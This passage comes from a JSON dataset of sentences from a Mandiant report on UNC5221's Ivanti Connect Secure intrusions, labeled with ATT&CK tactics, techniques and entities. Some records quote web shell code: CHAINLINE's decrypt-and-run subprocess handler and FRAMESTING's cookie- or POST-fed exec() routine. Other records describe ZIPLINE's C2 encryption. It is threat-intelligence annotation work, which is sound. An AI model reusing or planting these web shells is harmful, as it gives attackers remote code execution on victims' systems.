range(len(tmp)):\ntmp[i] = chr(ord(tmp[i]) ^", "sentence_text": "ord(RC4_KEY[i % len(RC4_KEY)]))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s44-1ca38a", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 44, "context_before": "ord(RC4_KEY[i % len(RC4_KEY)]))", "sentence_text": "tmp = \"\".join(tmp)\nreturn tmp\nclass Health(Resource):\ndef get(self):\nreturn {\"message\": \"method not allowed\"}, 201 def post(self):\nparser = reqparse.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s45-ea260c", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 45, "context_before": "tmp = \"\".join(tmp)\nreturn tmp\nclass Health(Resource):\ndef get(self):\nreturn {\"message\": \"method not allowed\"}, 201 def post(self):\nparser = reqparse.", "sentence_text": "RequestParser()\nparser.add_argument('stats', type=str)\nparser.add_argument('rates', type=str)\nargs = parser.parse_args()\ncommand: str = args.stats command = crypt(base64.b64decode(command.encode(encoding=\"UTF-8\")).decode (encoding=\"UTF-8\"))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s46-ae2957", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 46, "context_before": "RequestParser()\nparser.add_argument('stats', type=str)\nparser.add_argument('rates', type=str)\nargs = parser.parse_args()\ncommand: str = args.stats command = crypt(base64.b64decode(command.encode(encoding=\"UTF-8\")).decode (encoding=\"UTF-8\"))", "sentence_text": "result = subprocess.getoutput(command)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s47-976524", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 47, "context_before": "result = subprocess.getoutput(command)", "sentence_text": "result =\nbase64.b64encode(crypt(result).encode(encoding=\"UTF-8\")).decode\n(encoding=\"UTF-8\")\nreturn {\"message\": 'ok', \"stats\": result}, 200 Unlike WIREFIRE, which modifies an existing file, CHAINLINE creates a new file called health.py , which is not a legitimate filename in the CAV Python package.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "creates a new file called health.py", "entities": [ { "text": "WIREFIRE", "start": 146, "end": 154, "label": "MalwareTool" }, { "text": "CHAINLINE", "start": 189, "end": 198, "label": "MalwareTool" }, { "text": "health.py", "start": 225, "end": 234, "label": "Infrastructure_Indicator" }, { "text": "CAV Python package", "start": 279, "end": 297, "label": "Infrastructure_Indicator" }, { "text": "creates a new file", "start": 199, "end": 217, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s48-9fbe40", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 48, "context_before": "result =\nbase64.b64encode(crypt(result).encode(encoding=\"UTF-8\")).decode\n(encoding=\"UTF-8\")\nreturn {\"message\": 'ok', \"stats\": result}, 200 Unlike WIREFIRE, which modifies an existing file, CHAINLINE creates a new file called health.py , which is not a legitimate filename in the CAV Python package.", "sentence_text": "The existence of this filename or an associated compiled Python cache file may indicate the presence of CHAINLINE.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "existence of this filename or an associated compiled Python cache file", "entities": [ { "text": "CHAINLINE", "start": 104, "end": 113, "label": "MalwareTool" }, { "text": "indicate the presence", "start": 79, "end": 100, "label": "Action" }, { "text": "filename", "start": 22, "end": 30, "label": "Infrastructure_Indicator" }, { "text": "compiled Python cache file", "start": 48, "end": 74, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s49-3fd90d", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 49, "context_before": "The existence of this filename or an associated compiled Python cache file may indicate the presence of CHAINLINE.", "sentence_text": "UNC5221 registered a new API resource path to support the access of CHAINLINE at the REST endpoint /api/v1/cav/client/health .", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "registered a new API resource path /api/v1/cav/client/health", "entities": [ { "text": "UNC5221", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "CHAINLINE", "start": 68, "end": 77, "label": "MalwareTool" }, { "text": "/api/v1/cav/client/health", "start": 99, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "egistered a new API resource path", "start": 9, "end": 42, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s50-ab99d2", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 50, "context_before": "UNC5221 registered a new API resource path to support the access of CHAINLINE at the REST endpoint /api/v1/cav/client/health .", "sentence_text": "This was accomplished by importing the maliciously created Health API resource and then calling the add_resource()\nclass method on the FLASK-RESTful Api object within /home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/__init__.py FRAMESTING Web Shell FRAMESTING .", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "calling the add_resource() method to register the API", "entities": [ { "text": "FRAMESTING", "start": 245, "end": 255, "label": "MalwareTool" }, { "text": "/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/__init__.py", "start": 167, "end": 244, "label": "Infrastructure_Indicator" }, { "text": "calling the add_resource()", "start": 88, "end": 114, "label": "Action" }, { "text": "importing the maliciously created Health API resourc", "start": 25, "end": 77, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s51-6cd7de", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 51, "context_before": "This was accomplished by importing the maliciously created Health API resource and then calling the add_resource()\nclass method on the FLASK-RESTful Api object within /home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/__init__.py FRAMESTING Web Shell FRAMESTING .", "sentence_text": "FRAMESTING is a Python web shell embedded in a Ivanti Connect Secure Python package that enables arbitrary command execution.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "embedded in a Python package to enable arbitrary command execution", "entities": [ { "text": "FRAMESTING", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": "Ivanti Connect Secure Python package", "start": 47, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "enables arbitrary command execution", "start": 89, "end": 124, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s52-836972", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 52, "context_before": "FRAMESTING is a Python web shell embedded in a Ivanti Connect Secure Python package that enables arbitrary command execution.", "sentence_text": "def post(self):\nimport zlib\nimport simplejson as json try:\ndskey=''\ndsid=request.cookies.get('DSID')\ndata=None\nif dsid and len(dsid)>=64:\ndata=dsid+'=='\nelse:\ndata = zlib.decompress(request.data)\ndata=json.loads(data).get('data')", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s53-389032", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 53, "context_before": "def post(self):\nimport zlib\nimport simplejson as json try:\ndskey=''\ndsid=request.cookies.get('DSID')\ndata=None\nif dsid and len(dsid)>=64:\ndata=dsid+'=='\nelse:\ndata = zlib.decompress(request.data)\ndata=json.loads(data).get('data')", "sentence_text": "if data:\nimport base64\nfrom Cryptodome.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s54-b3ec85", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 54, "context_before": "if data:\nimport base64\nfrom Cryptodome.", "sentence_text": "Cipher import AES if dskey not in globals():globals()[dskey]={} globals()[dskey].pop('result',None)\naes=AES.new(dskey.encode(), AES.MODE_ECB)\nresult={'message':'','action':0}\nexec(zlib.decompress(aes.decrypt(base64.b64decode(data))),\n{'request':request,'cache':globals()[dskey]},locals())\nresult=globals()[dskey].get('result',result)\nreturn result, 200 except:\npass\nFRAMESTING was identified in the CAV Python package in the following path:\n/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/category.py\n.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "executes the command after multi-step decryption/decompression", "entities": [ { "text": "FRAMESTING", "start": 366, "end": 376, "label": "MalwareTool" }, { "text": "/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/category.py", "start": 441, "end": 528, "label": "Infrastructure_Indicator" }, { "text": "identified", "start": 381, "end": 391, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s55-544de1", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 55, "context_before": "Cipher import AES if dskey not in globals():globals()[dskey]={} globals()[dskey].pop('result',None)\naes=AES.new(dskey.encode(), AES.MODE_ECB)\nresult={'message':'','action':0}\nexec(zlib.decompress(aes.decrypt(base64.b64decode(data))),\n{'request':request,'cache':globals()[dskey]},locals())\nresult=globals()[dskey].get('result',result)\nreturn result, 200 except:\npass\nFRAMESTING was identified in the CAV Python package in the following path:\n/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/category.py\n.", "sentence_text": "Note that this is the same Python package modified to support the WIREFIRE and CHAINLINE web shells.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "modified to support the WIREFIRE and CHAINLINE web shells", "entities": [ { "text": "WIREFIRE", "start": 66, "end": 74, "label": "MalwareTool" }, { "text": "HAINLINE web shells", "start": 80, "end": 99, "label": "MalwareTool" }, { "text": "Python package", "start": 27, "end": 41, "label": "Infrastructure_Indicator" }, { "text": "modified", "start": 42, "end": 50, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s56-6cd029", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 56, "context_before": "Note that this is the same Python package modified to support the WIREFIRE and CHAINLINE web shells.", "sentence_text": "When installed, the threat actor can access FRAMESTING web shell at the REST endpoint /api/v1/cav/client/categories with a POST request.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "access FRAMESTING web shell at the REST endpoint", "entities": [ { "text": "threat actor", "start": 20, "end": 32, "label": "ThreatActor" }, { "text": "FRAMESTING web shell", "start": 44, "end": 64, "label": "MalwareTool" }, { "text": "/api/v1/cav/client/categories", "start": 86, "end": 115, "label": "Infrastructure_Indicator" }, { "text": "POST request", "start": 123, "end": 135, "label": "Infrastructure_Indicator" }, { "text": "installed", "start": 5, "end": 14, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s57-da6010", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 57, "context_before": "When installed, the threat actor can access FRAMESTING web shell at the REST endpoint /api/v1/cav/client/categories with a POST request.", "sentence_text": "Note that the legitimate categories endpoint only accepts GET requests.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s58-51ac1d", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 58, "context_before": "Note that the legitimate categories endpoint only accepts GET requests.", "sentence_text": "The web shell employs two methods of accepting commands from an attacker.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "employs two methods of accepting commands", "entities": [ { "text": "web shell ", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "employs two methods of accepting commands", "start": 14, "end": 55, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s59-948de5", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 59, "context_before": "The web shell employs two methods of accepting commands from an attacker.", "sentence_text": "It first attempts to retrieve the command stored in the value of a cookie named DSID from the current HTTP request.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "attempts to retrieve the command stored in a cookie named DSID", "entities": [ { "text": "cookie named DSID", "start": 67, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "retrieve the command", "start": 21, "end": 41, "label": "Action" }, { "text": "HTTP request", "start": 102, "end": 114, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s60-7c63b1", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 60, "context_before": "It first attempts to retrieve the command stored in the value of a cookie named DSID from the current HTTP request.", "sentence_text": "If the cookie is not present or is not of the expected length, it will attempt to decompress zlib data within the request's POST data.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Attempts to decompress zlib-encoded data from HTTP POST requests when expected cookie values are absent.", "entities": [ { "text": "attempt to decompress zlib data within the request's POST data", "start": 71, "end": 133, "label": "Action" }, { "text": "POST data", "start": 124, "end": 133, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s61-5c22c2", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 61, "context_before": "If the cookie is not present or is not of the expected length, it will attempt to decompress zlib data within the request's POST data.", "sentence_text": "Lastly, FRAMESTING will then pass the decrypted POST data into a Python exec()\nstatement to dynamically execute additional Python code.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "execute additional Python code via exec()", "entities": [ { "text": "FRAMESTING", "start": 8, "end": 18, "label": "MalwareTool" }, { "text": "execute additional Python code", "start": 104, "end": 134, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s62-25b7e2", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 62, "context_before": "Lastly, FRAMESTING will then pass the decrypted POST data into a Python exec()\nstatement to dynamically execute additional Python code.", "sentence_text": "Note that\nDSID\nis also the name of a cookie used by Ivanti Connect Secure appliances for maintaining user VPN sessions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s63-ae3ea0", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 63, "context_before": "Note that\nDSID\nis also the name of a cookie used by Ivanti Connect Secure appliances for maintaining user VPN sessions.", "sentence_text": "FRAMESTING likely uses the same cookie name to blend in with network traffic.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "uses the same cookie name to blend in with network traffic", "entities": [ { "text": "FRAMESTING", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": "uses the same cookie name", "start": 18, "end": 43, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s64-8c3029", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 64, "context_before": "FRAMESTING likely uses the same cookie name to blend in with network traffic.", "sentence_text": "Updates to ZIPLINE Analysis Since our previous blog post, Mandiant has completed additional analysis into the ZIPLINE passive backdoor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s65-5661ff", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 65, "context_before": "Updates to ZIPLINE Analysis Since our previous blog post, Mandiant has completed additional analysis into the ZIPLINE passive backdoor.", "sentence_text": "ZIPLINE makes use of extensive functionality to ensure the authentication of its custom protocol used to establish command and control (C2).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1094", "name": "Custom Command and Control Protocol" } ], "procedure": "establish command and control (C2) with a custom, authenticated protocol", "entities": [ { "text": "ZIPLINE", "start": 0, "end": 7, "label": "MalwareTool" }, { "text": "establish command and control (C2)", "start": 105, "end": 139, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s66-0de39e", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 66, "context_before": "ZIPLINE makes use of extensive functionality to ensure the authentication of its custom protocol used to establish command and control (C2).", "sentence_text": "Cryptography\nZIPLINE uses AES-128-CBC to encrypt data in both directions.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "uses AES-128-CBC to encrypt data in both directions", "entities": [ { "text": "ZIPLINE", "start": 13, "end": 20, "label": "MalwareTool" }, { "text": "uses AES-128-CBC", "start": 21, "end": 37, "label": "Action" }, { "text": "encrypt data", "start": 41, "end": 53, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s67-add56a", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 67, "context_before": "Cryptography\nZIPLINE uses AES-128-CBC to encrypt data in both directions.", "sentence_text": "The corresponding encryption and decryption keys are derived from key material sent by the server and combined with hard-coded data embedded in the malware.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "encryption and decryption keys are derived from server key material and combined with hard-coded data", "entities": [ { "text": "malware", "start": 148, "end": 155, "label": "MalwareTool" }, { "text": "encryption and decryption keys are derived", "start": 18, "end": 60, "label": "Action" }, { "text": "combined with hard-coded data", "start": 102, "end": 131, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s68-cd8769", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 68, "context_before": "The corresponding encryption and decryption keys are derived from key material sent by the server and combined with hard-coded data embedded in the malware.", "sentence_text": "Once combined, the SHA1 hashing algorithm is used to produce a 20-byte long cryptographically strong array and the first 16 bytes of it are used as the AES-128 keys.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "SHA1 hashing algorithm is used to produce AES-128 keys", "entities": [ { "text": "used as the AES-128 keys.", "start": 140, "end": 165, "label": "Action" }, { "text": "SHA1 hashing algorithm is used", "start": 19, "end": 49, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s69-74cd9d", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 69, "context_before": "Once combined, the SHA1 hashing algorithm is used to produce a 20-byte long cryptographically strong array and the first 16 bytes of it are used as the AES-128 keys.", "sentence_text": "The truncated first 16 bytes of the SHA1 hash are then used for both the AES-128 and the HMAC keys (HMAC is described in more details in the next section).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s70-abeb10", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 70, "context_before": "The truncated first 16 bytes of the SHA1 hash are then used for both the AES-128 and the HMAC keys (HMAC is described in more details in the next section).", "sentence_text": "The starting value for the AES initialization vectors (IVs) for the decryption and encryption operations are the first 16 bytes of the decryption_keydata and encryption_keydata arrays.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s71-61e600", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 71, "context_before": "The starting value for the AES initialization vectors (IVs) for the decryption and encryption operations are the first 16 bytes of the decryption_keydata and encryption_keydata arrays.", "sentence_text": "This makes it possible to harvest the keys and the IVs possible from process memory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s72-b1159d", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 72, "context_before": "This makes it possible to harvest the keys and the IVs possible from process memory.", "sentence_text": "Because the protocol used by ZIPLINE is stateful, the messages cannot be decrypted and authenticated out of order.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s73-9d45b9", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 73, "context_before": "Because the protocol used by ZIPLINE is stateful, the messages cannot be decrypted and authenticated out of order.", "sentence_text": "Additionally, the process that contains the passive backdoor is designed to have a relatively short lifespan, terminating after each of the processed commands and likely respawned by the malware ecosystem running on the compromised host.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s74-0ea50a", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 74, "context_before": "Additionally, the process that contains the passive backdoor is designed to have a relatively short lifespan, terminating after each of the processed commands and likely respawned by the malware ecosystem running on the compromised host.", "sentence_text": "Authentication\nZIPLINE uses HMAC (Hash-based Message Authentication Code) along with the SHA1 hashing algorithm to enforce data integrity.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "uses HMAC along with SHA1 to enforce data integrity", "entities": [ { "text": "enforce data integrity", "start": 115, "end": 137, "label": "Action" }, { "text": "ZIPLINE", "start": 15, "end": 22, "label": "MalwareTool" }, { "text": "uses HMAC (Hash-based Message Authentication Code)", "start": 23, "end": 73, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s75-4fc2f3", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 75, "context_before": "Authentication\nZIPLINE uses HMAC (Hash-based Message Authentication Code) along with the SHA1 hashing algorithm to enforce data integrity.", "sentence_text": "The HMAC key is the same as the corresponding AES-128 key (note, there are two: one for decryption and one for encryption).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s76-8e4b00", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 76, "context_before": "The HMAC key is the same as the corresponding AES-128 key (note, there are two: one for decryption and one for encryption).", "sentence_text": "The HMAC design in ZIPLINE uses a transfer state, which denotes the index of the current message starting from 0.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s77-944c95", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 77, "context_before": "The HMAC design in ZIPLINE uses a transfer state, which denotes the index of the current message starting from 0.", "sentence_text": "Every received or sent packet increments the index and the value is appended to the message as part of the authentication mechanism.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "increment and append index for authentication", "entities": [ { "text": "increments the index", "start": 30, "end": 50, "label": "Action" }, { "text": "appended to the message", "start": 68, "end": 91, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s78-c12753", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 78, "context_before": "Every received or sent packet increments the index and the value is appended to the message as part of the authentication mechanism.", "sentence_text": "That way messages out of order would not be able to authenticate, which would lead to termination of the communication with the C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "terminate communication on failed authentication", "entities": [ { "text": "C2 server", "start": 128, "end": 137, "label": "Infrastructure_Indicator" }, { "text": "termination of the communication", "start": 86, "end": 118, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s79-66246e", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 79, "context_before": "That way messages out of order would not be able to authenticate, which would lead to termination of the communication with the C2 server.", "sentence_text": "In Figure 11, a 32-byte long message is received from the C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "receive a message from the C2 server", "entities": [ { "text": "C2 server", "start": 58, "end": 67, "label": "Infrastructure_Indicator" }, { "text": "received", "start": 40, "end": 48, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s80-151832", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 80, "context_before": "In Figure 11, a 32-byte long message is received from the C2 server.", "sentence_text": "The HMAC algorithm then calculates the SHA1 hash of the buffer in Figure 11, and then compares it with the SHA1 hash attached at the end of every message sent and received.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "calculate and compare HMAC for message authentication", "entities": [ { "text": "calculates the SHA1 hash", "start": 24, "end": 48, "label": "Action" }, { "text": "compares it", "start": 86, "end": 97, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s81-bdb2e0", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 81, "context_before": "The HMAC algorithm then calculates the SHA1 hash of the buffer in Figure 11, and then compares it with the SHA1 hash attached at the end of every message sent and received.", "sentence_text": "Data Protocol\nZIPLINE communicates with its C2 server using a custom stateful binary protocol.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1094", "name": "Custom Command and Control Protocol" } ], "procedure": "communicate using a custom stateful binary protocol", "entities": [ { "text": "ZIPLINE", "start": 14, "end": 21, "label": "MalwareTool" }, { "text": "C2 server", "start": 44, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "communicates", "start": 22, "end": 34, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s82-b25186", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 82, "context_before": "Data Protocol\nZIPLINE communicates with its C2 server using a custom stateful binary protocol.", "sentence_text": "The communication begins with the C2 server connecting to the compromised host and sending a message, structured as shown in Figure 12.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" } ], "procedure": "C2 server connects and sends a message", "entities": [ { "text": "C2 server", "start": 34, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "connecting", "start": 44, "end": 54, "label": "Action" }, { "text": "sending a message", "start": 83, "end": 100, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s83-610463", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 83, "context_before": "The communication begins with the C2 server connecting to the compromised host and sending a message, structured as shown in Figure 12.", "sentence_text": "typedef struct tag_header_t { char signature[21];\nstruct tag_key_material key_material;\n} header_t;", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s84-0d1a07", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 84, "context_before": "typedef struct tag_header_t { char signature[21];\nstruct tag_key_material key_material;\n} header_t;", "sentence_text": "The signature is expected to be the string SSH-2.0-OpenSSH_0.3xx , followed by a structure that contains data for AES-128 and HMAC key generation (see the Cryptography).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s85-b044d3", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 85, "context_before": "The signature is expected to be the string SSH-2.0-OpenSSH_0.3xx , followed by a structure that contains data for AES-128 and HMAC key generation (see the Cryptography).", "sentence_text": "Next, the C2 sends an encrypted message that, once decrypted, follows the structure described in Figure 13.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "C2 sends an encrypted message", "entities": [ { "text": "C2", "start": 10, "end": 12, "label": "Infrastructure_Indicator" }, { "text": "sends an encrypted message", "start": 13, "end": 39, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s86-6bd85d", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 86, "context_before": "Next, the C2 sends an encrypted message that, once decrypted, follows the structure described in Figure 13.", "sentence_text": "typedef struct tag_message_t { uint16_t len; /* big endian number */ uint8_t data[len]; /* variable size data */ uint8_t hmac_sig[20];\n} message_t;", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s87-0e30bb", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 87, "context_before": "typedef struct tag_message_t { uint16_t len; /* big endian number */ uint8_t data[len]; /* variable size data */ uint8_t hmac_sig[20];\n} message_t;", "sentence_text": "Although the message structure is designed to be flexible, this instance of the malware expects the first message to specify length 0x10.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s88-3a2850", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, 